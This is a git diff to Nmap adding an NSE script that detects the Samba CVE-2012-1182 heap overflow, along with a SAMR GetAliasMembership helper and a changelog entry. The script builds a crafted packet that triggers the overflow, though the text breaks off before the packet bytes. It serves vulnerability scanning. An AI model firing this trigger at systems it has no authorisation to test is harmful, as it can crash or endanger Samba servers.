diff --git a/CHANGELOG b/CHANGELOG
index ce4ce2620..25cd4e3d3 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,6 +1,9 @@
# Nmap Changelog ($Id$); -*-text-*-
-o [NSE] Added the dns-check-zone script that checks DNS configuration against
+o [NSE] Added the script samba-vuln-cve-2012-1182 which detects the SAMBA CVE
+ 2012-1182 vulnerability. [Aleksandar Nikolic]
+
+o [NSE] Added the script dns-check-zone that checks DNS configuration against
best practices including RFC 1912. [Patrik Karlsson]
o [NSE] Added the http-gitweb-projects-enum that queries a gitweb for a list
diff --git a/nselib/msrpc.lua b/nselib/msrpc.lua
index 178d8f6d7..f85d4c8ac 100644
--- a/nselib/msrpc.lua
+++ b/nselib/msrpc.lua
@@ -1584,6 +1584,29 @@ function samr_openalias(smbstate, domain_handle, rid)
return true, result
end
+---Call the GetAliasMembership function.
+--Sends the "raw" data, without marshaling.
+--
+--@param smbstate The SMB state table
+--@param alias_handle The alias_handle, already marshaled
+--@param args Actuall data to send, already marshaled
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values.
+function samr_getaliasmembership(smbstate, alias_handle,args)
+ local status, result
+ local arguments
+
+ arguments = ''
+
+ arguments = arguments .. alias_handle .. args
+ -- Do the call
+ status, result = call_function(smbstate, 0x10, arguments)
+ if(status ~= true) then
+ return false, result
+ end
+
+ return true, result
+end
+
---Call the GetMembersInAlias function, which retrieves a list of users in
-- a group.
--
diff --git a/scripts/samba-vuln-cve-2012-1182.nse b/scripts/samba-vuln-cve-2012-1182.nse
new file mode 100644
index 000000000..68c5aea3a
--- /dev/null
+++ b/scripts/samba-vuln-cve-2012-1182.nse
@@ -0,0 +1,127 @@
+description = [[
+Check if the machine is vulnerable to Samba heap overflow vulnerability
+marked with CVE-2012-1182.
+
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+
+
+CVE-2012-1182 marks multiple heap overflow vulnerabilities located in
+PIDL based autogenerated code. This check script is based on PoC by ZDI
+marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray
+function where an attacker is under control of num_sids and can cause
+insuficient memory to be allocated, leading to heap buffer overflow
+and posibility of remote code execution.
+
+Script builds a malitious packet and makes a SAMR GetAliasMembership
+call which triggers the vulnerability. On the vulnerable system,
+connection is droped and result is "Failed to receive bytes after 5 attempts".
+On patched system, samba throws an error and result is "MSRPC call
+returned a fault (packet type)".
+
+References:
+* https://bugzilla.samba.org/show_bug.cgi?id=8815
+* http://www.samba.org/samba/security/CVE-2012-1182
+
+]]
+
+-----------------------------------------------------------------------
+---
+-- @usage
+-- nmap --script=samba-vuln-cve-2012-1182 -p 139
+-- @output
+-- PORT STATE SERVICE
+-- 139/tcp open netbios-ssn
+--
+-- Host script results:
+-- | samba-vuln-cve-2012-1182:
+-- | VULNERABLE:
+-- | SAMBA remote heap overflow
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2012-1182
+-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
+-- | Description:
+-- | Samba versions 3.6.3 and all versions previous to this are affected by
+-- | a vulnerability that allows remote code execution as the "root" user
+-- | from an anonymous connection.
+-- |
+-- | Disclosure date: 2012-03-15
+-- | References:
+-- | http://www.samba.org/samba/security/CVE-2012-1182
+-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182
+
+author = "Aleksandar Nikolic"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+require 'msrpc'
+require 'smb'
+require 'stdnse'
+require 'vulns'
+hostrule = function(host)
+ return smb.get_port(host) ~= nil
+end
+
+action = function(host,port)
+
+ local result, stats
+ local response = {}
+
+ local samba_cve = {
+ title = "SAMBA remote heap overflow",
+ IDS = {CVE = 'CVE-2012-1182'},
+ risk_factor = "HIGH",
+ scores = {
+ CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)",
+ },
+ description = [[
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+ ]],
+ references = {
+ 'http://www.samba.org/samba/security/CVE-2012-1182',
+ },
+ dates = {
+ disclosure = {year = '2012', month = '03', day = '15'},
+ },
+ exploit_results = {},
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ samba_cve.state = vulns.STATE.NOT_VULN
+
+ -- create SMB session
+ status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)
+ if(status == false) then
+ return false, smbstate
+ end
+
+ -- bind to SAMR service
+ status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
+ if(status == false) then
+ msrpc.stop_smb(smbstate)
+ return false, bind_result
+ end
+
+ -- create malicious packet, same as in the PoC
+ data = bin.pack("